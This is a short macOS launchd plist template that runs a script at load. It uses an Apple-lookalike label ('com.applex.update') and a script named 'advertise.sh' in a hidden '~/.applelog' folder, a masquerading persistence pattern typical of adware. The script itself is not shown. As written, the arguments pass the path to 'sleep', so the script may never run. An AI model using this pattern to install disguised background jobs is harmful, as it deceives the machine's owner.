<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
      <!-- YOUR SELF-CHOSEN *UNIQUE* LABEL (TASK ID) HERE -->
    <string>com.applex.update.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>sleep</string>
        <string>60</string>
          <!-- YOUR *FULL, LITERAL* SCRIPT PATH HERE -->
        <string>~/.applelog/advertise.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
